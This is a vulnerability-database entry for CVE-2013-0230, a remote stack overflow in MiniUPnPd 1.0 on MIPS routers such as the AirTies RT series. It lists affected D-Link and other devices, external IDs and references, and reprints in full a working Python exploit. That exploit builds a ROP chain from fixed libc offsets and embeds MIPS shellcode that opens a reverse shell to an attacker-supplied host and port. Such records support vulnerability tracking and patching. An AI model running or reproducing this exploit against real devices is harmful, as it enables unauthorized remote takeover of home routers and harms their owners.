ID

VAR-E-201301-0051


CVE

cve_id:CVE-2013-0230

Trust: 3.4

cve_id:CVE-2013-0229

Trust: 1.4

sources: BID: 57607 // BID: 57608 // PACKETSTORM: 131651 // PACKETSTORM: 132599 // PACKETSTORM: 121873 // EXPLOIT-DB: 36839 // EDBNET: 58136 // EDBNET: 23462

EDB ID

36839


TITLE

MiniUPnPd 1.0 (MIPS) - Remote Stack Overflow Remote Code Execution for AirTies RT Series - Multiple remote Exploit

Trust: 0.6

sources: EXPLOIT-DB: 36839

DESCRIPTION

MiniUPnPd 1.0 (MIPS) - Remote Stack Overflow Remote Code Execution for AirTies RT Series. CVE-2013-0230CVE-89624 . remote exploit for Multiple platform

Trust: 0.6

sources: EXPLOIT-DB: 36839

AFFECTED PRODUCTS

vendor:miniupnpdmodel: - scope:eqversion:1.0

Trust: 1.1

vendor:miniupnpdmodel: - scope:eqversion:1.0

Trust: 1.0

vendor:miniupnpmodel:project miniupnpscope:eqversion:1.0

Trust: 0.6

vendor:miniupnpmodel:project miniupnpscope:neversion:1.4

Trust: 0.6

vendor:infomarkmodel:imw-c920w miniupnpdscope:eqversion:1.0

Trust: 0.6

vendor:miniupnpdmodel:remotescope:eqversion:1.0

Trust: 0.5

vendor:miniupnpdmodel:stack buffer overflowscope:eqversion:1.0

Trust: 0.5

vendor:miniupnpmodel:project miniupnpscope:eqversion:1.3

Trust: 0.3

vendor:d linkmodel:dir-836lscope:eqversion:1.03

Trust: 0.3

vendor:d linkmodel:dir-826l 1.04b05scope: - version: -

Trust: 0.3

vendor:d linkmodel:dir-636lscope:eqversion:1.03

Trust: 0.3

vendor:d linkmodel:dir-626lscope:eqversion:1.03

Trust: 0.3

vendor:miniupnpmodel:project miniupnpscope:neversion:1.3

Trust: 0.3

vendor:miniupnpmodel:project miniupnpscope:neversion:1.1

Trust: 0.3

vendor:d linkmodel:dir-836l 1.04b09scope:neversion: -

Trust: 0.3

vendor:d linkmodel:dir-826l 1.05b06scope:neversion: -

Trust: 0.3

vendor:d linkmodel:dir-636l 1.05b07scope:neversion: -

Trust: 0.3

vendor:d linkmodel:dir-626l 1.04b04scope:neversion: -

Trust: 0.3

sources: BID: 57607 // BID: 57608 // PACKETSTORM: 131651 // PACKETSTORM: 132599 // PACKETSTORM: 121873 // EXPLOIT-DB: 36839 // EDBNET: 58136 // EDBNET: 23462

EXPLOIT

#!/usr/bin/env python

# Exploit Title: MiniUPnPd 1.0 Stack Overflow RCE for AirTies RT Series
# Date: 26.04.2015
# Exploit Author: Onur ALANBEL (BGA)
# Vendor Homepage: http://miniupnp.free.fr/
# Version: 1.0
# Architecture: MIPS
# Tested on: AirTies RT-204v3
# CVE : 2013-0230
# Exploit gives a reverse shell to lhost:lport
# Details: https://www.exploit-db.com/docs/english/36806-developing-mips-exploits-to-hack-routers.pdf

import urllib2
from string import join
from argparse import ArgumentParser
from struct import pack
from socket import inet_aton

BYTES = 4

def hex2str(value, size=BYTES):
data = ""

for i in range(0, size):
data += chr((value >> (8*i)) & 0xFF)

data = data[::-1]

return data

arg_parser = ArgumentParser(prog="miniupnpd_mips.py", description="MiniUPnPd \
CVE-2013-0230 Reverse Shell exploit for AirTies \
RT Series, start netcat on lhost:lport")
arg_parser.add_argument("--target", required=True, help="Target IP address")
arg_parser.add_argument("--lhost", required=True, help="The IP address\
which nc is listening")
arg_parser.add_argument("--lport", required=True, type=int, help="The\
port which nc is listening")

args = arg_parser.parse_args()

libc_base = 0x2aabd000
ra_1 = hex2str(libc_base + 0x36860) # ra = 1. gadget
s1 = hex2str(libc_base + 0x1636C) # s1 = 2. gadget
sleep = hex2str(libc_base + 0x35620) # sleep function
ra_2 = hex2str(libc_base + 0x28D3C) # ra = 3. gadget
s6 = hex2str(libc_base + 0x1B19C) # ra = 4.gadget
s2 = s6
lport = pack('>H', args.lport)
lhost = inet_aton(args.lhost)

shellcode = join([
"\x24\x11\xff\xff"
"\x24\x04\x27\x0f"
"\x24\x02\x10\x46"
"\x01\x01\x01\x0c"
"\x1e\x20\xff\xfc"
"\x24\x11\x10\x2d"
"\x24\x02\x0f\xa2"
"\x01\x01\x01\x0c"
"\x1c\x40\xff\xf8"
"\x24\x0f\xff\xfa"
"\x01\xe0\x78\x27"
"\x21\xe4\xff\xfd"
"\x21\xe5\xff\xfd"
"\x28\x06\xff\xff"
"\x24\x02\x10\x57"
"\x01\x01\x01\x0c"
"\xaf\xa2\xff\xff"
"\x8f\xa4\xff\xff"
"\x34\x0f\xff\xfd"
"\x01\xe0\x78\x27"
"\xaf\xaf\xff\xe0"
"\x3c\x0e" + lport +
"\x35\xce" + lport +
"\xaf\xae\xff\xe4"
"\x3c\x0e" + lhost[:2] +
"\x35\xce" + lhost[2:4] +
"\xaf\xae\xff\xe6"
"\x27\xa5\xff\xe2"
"\x24\x0c\xff\xef"
"\x01\x80\x30\x27"
"\x24\x02\x10\x4a"
"\x01\x01\x01\x0c"
"\x24\x0f\xff\xfd"
"\x01\xe0\x78\x27"
"\x8f\xa4\xff\xff"
"\x01\xe0\x28\x21"
"\x24\x02\x0f\xdf"
"\x01\x01\x01\x0c"
"\x24\x10\xff\xff"
"\x21\xef\xff\xff"
"\x15\xf0\xff\xfa"
"\x28\x06\xff\xff"
"\x3c\x0f\x2f\x2f"
"\x35\xef\x62\x69"
"\xaf\xaf\xff\xec"
"\x3c\x0e\x6e\x2f"
"\x35\xce\x73\x68"
"\xaf\xae\xff\xf0"
"\xaf\xa0\xff\xf4"
"\x27\xa4\xff\xec"
"\xaf\xa4\xff\xf8"
"\xaf\xa0\xff\xfc"
"\x27\xa5\xff\xf8"
"\x24\x02\x0f\xab"
"\x01\x01\x01\x0c"
], '')

payload = 'C'*2052 + s1 + 'C'*(4*4) + s6 + ra_1 + 'C'*28 + sleep + 'C'*40 + s2\
+ ra_2 + 'C'*32 + shellcode

soap_headers = {
'SOAPAction': "n:schemas-upnp-org:service:WANIPConnection:1#" + payload,
}

soap_data = """
<?xml version='1.0' encoding="UTF-8"?>
<SOAP-ENV:Envelope
SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
>
<SOAP-ENV:Body>
<ns1:action xmlns:ns1="urn:schemas-upnp-org:service:WANIPConnection:1"\
SOAP-ENC:root="1">
</ns1:action>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
"""

try:
print "Exploiting..."
req = urllib2.Request("http://" + args.target + ":5555", soap_data,
soap_headers)
res = urllib2.urlopen(req).read()
except:
print "Ok"

Trust: 1.0

sources: EXPLOIT-DB: 36839

EXPLOIT LANGUAGE

py

Trust: 0.6

sources: EXPLOIT-DB: 36839

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 36839

TYPE

Remote Stack Overflow Remote Code Execution for AirTies RT Series

Trust: 1.0

sources: EXPLOIT-DB: 36839

TAGS

tag:exploit

Trust: 1.5

tag:remote

Trust: 1.0

tag:overflow

Trust: 1.0

tag:shell

Trust: 0.5

tag:code execution

Trust: 0.5

tag:denial of service

Trust: 0.5

tag:web

Trust: 0.5

sources: PACKETSTORM: 131651 // PACKETSTORM: 132599 // PACKETSTORM: 121873

CREDITS

Onur Alanbel (BGA)

Trust: 0.6

sources: EXPLOIT-DB: 36839

EXTERNAL IDS

db:NVDid:CVE-2013-0230

Trust: 4.0

db:EXPLOIT-DBid:36839

Trust: 1.6

db:NVDid:CVE-2013-0229

Trust: 1.4

db:EDBNETid:58136

Trust: 0.6

db:0DAYTODAYid:23837

Trust: 0.6

db:EDBNETid:23462

Trust: 0.6

db:PACKETSTORMid:131651

Trust: 0.5

db:PACKETSTORMid:132599

Trust: 0.5

db:PACKETSTORMid:121873

Trust: 0.5

db:CERT/CCid:VU#922681

Trust: 0.3

db:BIDid:57607

Trust: 0.3

db:BIDid:57608

Trust: 0.3

sources: BID: 57607 // BID: 57608 // PACKETSTORM: 131651 // PACKETSTORM: 132599 // PACKETSTORM: 121873 // EXPLOIT-DB: 36839 // EDBNET: 58136 // EDBNET: 23462

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2013-0230

Trust: 3.1

url:https://nvd.nist.gov/vuln/detail/cve-2013-0229

Trust: 1.1

url:https://www.exploit-db.com/exploits/36839/

Trust: 0.6

url:https://0day.today/exploits/23837

Trust: 0.6

url:https://community.rapid7.com/community/infosec/blog/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play

Trust: 0.3

url:http://www.kb.cert.org/vuls/id/922681

Trust: 0.3

url:http://miniupnp.free.fr/

Trust: 0.3

url:https://community.rapid7.com/servlet/jiveservlet/download/2150-1-16596/securityflawsupnp.pdf

Trust: 0.3

sources: BID: 57607 // PACKETSTORM: 131651 // PACKETSTORM: 132599 // PACKETSTORM: 121873 // EXPLOIT-DB: 36839 // EDBNET: 58136 // EDBNET: 23462

SOURCES

db:BIDid:57607
db:BIDid:57608
db:PACKETSTORMid:131651
db:PACKETSTORMid:132599
db:PACKETSTORMid:121873
db:EXPLOIT-DBid:36839
db:EDBNETid:58136
db:EDBNETid:23462

LAST UPDATE DATE

2022-07-27T09:12:10.202000+00:00


SOURCES UPDATE DATE

db:BIDid:57607date:2013-01-28T00:00:00
db:BIDid:57608date:2015-05-12T19:46:00

SOURCES RELEASE DATE

db:BIDid:57607date:2013-01-28T00:00:00
db:BIDid:57608date:2013-01-28T00:00:00
db:PACKETSTORMid:131651date:2015-04-27T15:55:55
db:PACKETSTORMid:132599date:2015-07-08T00:53:09
db:PACKETSTORMid:121873date:2013-06-05T00:50:31
db:EXPLOIT-DBid:36839date:2015-04-27T00:00:00
db:EDBNETid:58136date:2015-04-27T00:00:00
db:EDBNETid:23462date:2015-07-08T00:00:00